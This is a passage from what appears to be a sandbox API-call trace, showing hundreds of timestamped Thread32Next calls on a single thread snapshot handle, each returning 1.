(hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.153] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.154] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.154] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.155] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.157] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.157] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.158] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.354] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.355] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.356] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.357] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.397] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.398] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.398] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.399] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.400] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.400] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.401] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.402] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.403] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.403] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.404] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.405] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.405] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.406] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.407] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.408] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.408] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.409] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.410] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.410] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.411] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.412] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.413] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.413] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.414] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.415] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.416] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.416] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.417] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.418] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.419] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.419] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.420] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.421] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.422] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.422] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.423] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.424] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.424] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.425] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.426] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.643] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.644] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.645] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.645] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.646] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.647] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.648] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.649] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.649] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.650] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.651] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.652] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.653] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.653] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.654] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.655] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.656] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.657] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.658] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.658] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.659] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.660] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.661] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.661] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.663] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.664] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.664] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.665] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.666] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.666] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.667] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.668] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.669] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.669] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.670] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.674] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.674] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.676] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.676] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.677] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.678] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.679] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.679] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.680] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.681] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.840] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.841] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.842] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.843] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.843] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.844] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.845] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.846] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.847] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.848] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.848] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.849] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.850] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.851] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.852] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.852] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.853] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.854] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.856] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.856] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.857] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.858] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.859] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.861] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.862] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.862] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.863] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.864] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.865] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.866] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.867] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.868] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.869] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.869] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.870] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.871] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.872] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.873] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.873] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.874] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.875] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.134] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.135] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.135] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.137] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.140] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.140] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.141] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.143] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.149] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.149] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.150] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.151] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.152] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.152] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.153] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.154] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.154] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.155] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.156] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.156] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.157] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.158] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.158] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.159] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.160] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.161] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.161] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.162] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.163] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.164] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.164] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.165] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.166] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.167] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.422] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.423] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.423] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.424] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.425] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.425] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.426] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.427] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.428] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.429] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.429] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.430] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.432] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.432] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.433] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.434] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.434] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.435] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.436] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.437] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.437] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.438] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.439] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.440] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.441] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.441] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.442] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.443] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.444] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.444] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.445] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.446] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.446] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.447] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.448] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.449] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.450] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.450] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.451] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.452] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.452] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.453] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.454] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.455] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.455] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.456] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.677] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.678] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.679] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.680] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.681] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.681] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.682] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.683] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.683] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.684] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.685] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.686] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.686] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.687] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.688] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.688] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.689] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.690] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.691] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.691] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.692] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.693] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.694] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.694] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.695] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.696] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.696] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.697] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.698] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.699] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.699] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.700] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.701] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.701] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.702] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.703] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.704] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.705] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.705] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.706] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.707] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.708] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.709] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.710] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.710] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.711] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.712] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.712] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.933] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.934] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.935] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.936] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.937] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.938] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.939] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.940] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.940] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.941] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.942] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.943] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.943] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.944] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.945] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.945] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.946] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.947] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.947] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.948] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.949] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.949] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.950] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.953] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.954] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.955] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.956] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.957] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.958] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.959] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.959] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.960] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.961] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.962] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.963] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.963] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.964] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.965] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.966] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.966] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.967] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.968] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.969] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0238.969] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.181] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.182] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.183] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.184] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.185] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.186] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.188] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.189] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.191] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.192] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.192] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.193] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.194] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.195] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.196] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.197] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.197] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.198] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.199] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.200] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.200] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.201] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.202] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.203] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.203] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.204] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.205] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.205] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.206] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.207] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.208] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.208] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0239.209] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 